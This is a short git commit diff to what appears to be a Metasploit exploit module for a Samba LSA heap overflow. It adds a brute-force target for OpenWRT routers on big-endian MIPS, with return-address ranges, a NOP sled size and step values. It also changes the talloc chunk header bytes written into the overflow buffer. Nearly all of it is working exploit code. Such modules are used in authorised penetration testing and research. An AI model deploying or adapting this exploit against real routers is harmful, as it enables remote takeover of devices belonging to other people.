Adding changes to Samba exploit to target MIPSBE (this is for OpenWRT on a router

JanMitchell · JanMitchell · commit 411689aa444f · 2016-09-01T10:05:13.000+01:00
diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb
@@ -168,6 +168,20 @@ def initialize(info = {})
           }
           ],
 
+          ['Linux Heap Brute Force (OpenWRT MIPS)',
+          {
+            'Platform'      => 'linux',
+            'Arch'          => [ ARCH_MIPSBE ],
+            'Nops'          => 64*1024,
+            'Bruteforce'    =>
+              {
+                'Start' => { 'Ret' => 0x55900000 },
+                'Stop'  => { 'Ret' => 0x559c0000 },
+                'Step'  => 60*1024,
+              }
+          }
+          ],
+
           ['DEBUG',
           {
             'Platform'      => 'linux',
@@ -267,7 +281,7 @@ def brute_exploit(target_addrs)
     talloc_magic = "\x70\xec\x14\xe8"
 
     # second talloc_chunk header
-    buf << 'A' * 8                   # next, prev
+    buf << NDR.long(0) + NDR.long(0) # next, prev
     buf << NDR.long(0) + NDR.long(0) # parent, child
     buf << NDR.long(0)               # refs
     buf << [target_addrs['Ret']].pack('V') # destructor
